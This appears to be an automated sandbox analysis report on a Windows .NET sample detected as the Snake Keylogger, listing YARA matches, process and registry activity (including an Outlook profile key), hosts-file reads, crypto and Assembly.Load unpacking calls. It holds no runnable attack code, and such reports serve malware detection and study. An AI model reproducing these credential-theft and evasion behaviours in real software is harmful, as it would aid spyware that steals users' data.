Source: 00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6780, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe PID: 6444, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 1_2_00D72050	1_2_00D72050
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 1_2_02EBC124	1_2_02EBC124
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 1_2_02EBE560	1_2_02EBE560
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 1_2_02EBE570	1_2_02EBE570
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 1_2_05A287E0	1_2_05A287E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 1_2_05A291F0	1_2_05A291F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 1_2_05A2EF60	1_2_05A2EF60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 1_2_05A209B0	1_2_05A209B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 1_2_05A26798	1_2_05A26798
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 1_2_05A217F5	1_2_05A217F5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_00EF2050	7_2_00EF2050
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0175C1D7	7_2_0175C1D7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0175E183	7_2_0175E183
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_01755300	7_2_01755300
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_01753578	7_2_01753578
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0175E5E3	7_2_0175E5E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0175D660	7_2_0175D660
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_017586B0	7_2_017586B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_01754B88	7_2_01754B88
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0175EA40	7_2_0175EA40
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0175CD60	7_2_0175CD60
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0175DD21	7_2_0175DD21
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0175D650	7_2_0175D650
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0175B6F7	7_2_0175B6F7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0175B6F8	7_2_0175B6F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0175B6E8	7_2_0175B6E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069226D0	7_2_069226D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069256E8	7_2_069256E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069297C8	7_2_069297C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069284E0	7_2_069284E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06923400	7_2_06923400
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0692A468	7_2_0692A468
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06924588	7_2_06924588
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06925290	7_2_06925290
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069263F0	7_2_069263F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06920040	7_2_06920040
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069271F8	7_2_069271F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06924108	7_2_06924108
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06929178	7_2_06929178
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06927E98	7_2_06927E98
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06929E18	7_2_06929E18
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06924E38	7_2_06924E38
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06925F98	7_2_06925F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06922FA8	7_2_06922FA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06923CB0	7_2_06923CB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06920C68	7_2_06920C68
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0692AAB0	7_2_0692AAB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06928B28	7_2_06928B28
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06922B50	7_2_06922B50
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06925B40	7_2_06925B40
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06923858	7_2_06923858
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06927848	7_2_06927848
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069249E0	7_2_069249E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06921968	7_2_06921968
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069256DB	7_2_069256DB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069226C3	7_2_069226C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069297B8	7_2_069297B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069284D0	7_2_069284D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0692A45C	7_2_0692A45C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06924579	7_2_06924579
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06925280	7_2_06925280
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069263E0	7_2_069263E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06920013	7_2_06920013
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069271E7	7_2_069271E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06929168	7_2_06929168
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06927E88	7_2_06927E88
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06929E08	7_2_06929E08
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06924E28	7_2_06924E28
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06922F9B	7_2_06922F9B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06925F88	7_2_06925F88
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06923CA0	7_2_06923CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0692AAA0	7_2_0692AAA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06928B18	7_2_06928B18
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06925B30	7_2_06925B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_06922B40	7_2_06922B40
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069208F0	7_2_069208F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069208E0	7_2_069208E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0692783B	7_2_0692783B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_069249CF	7_2_069249CF

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.423751181.0000000004499000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMknmypcfelxntmmpokqqqu.dll" vs SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameiJMJnUDAnLMGBkvrphkwZ.exeL vs SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMknmypcfelxntmmpokqqqu.dll" vs SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434562162.0000000003239000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameiJMJnUDAnLMGBkvrphkwZ.exeL vs SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameiJMJnUDAnLMGBkvrphkwZ.exeL vs SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.432803577.0000000000D76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefact.exe4 vs SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.434160848.00000000030E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000000.430342294.0000000000EF6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefact.exe4 vs SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000002.605876598.00000000012F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000007.00000000.430219815.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameiJMJnUDAnLMGBkvrphkwZ.exeL vs SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Binary or memory string: OriginalFilenamefact.exe4 vs SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Virustotal: Detection: 15%
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	ReversingLabs: Detection: 26%

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/4

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355657596.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355479066.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355587469.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355370104.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 5Informal Roman is a Trademark of Esselte Corporation.slnt
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.355923706.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Corporation.slnt

Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, A?u05c9t?/uf0b9????.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, ufffd?ufffdu002d?/??O?ufffd.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, A?u05c9t?/uf0b9????.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, ufffd?ufffdu002d?/??O?ufffd.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, A?u05c9t?/uf0b9????.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, ufffd?ufffdu002d?/??O?ufffd.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, A?u05c9t?/uf0b9????.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

.NET source code contains potential unpacker

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.d70000.0.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.d70000.0.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.ef0000.1.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.ef0000.0.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.ef0000.11.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.ef0000.1.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.ef0000.2.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.ef0000.13.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.ef0000.7.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.ef0000.9.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.ef0000.3.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.ef0000.5.unpack, Form3.cs	.Net Code: GetAssembly System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0692C491 push es; retf	7_2_0692C498
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0692C499 push es; retf	7_2_0692C4A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0692C3E1 push es; retf	7_2_0692C408
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Code function: 7_2_0692C345 push es; retf	7_2_0692C370

Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Static PE information: 0x9CFD79CF [Wed Jun 18 11:04:47 2053 UTC]

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
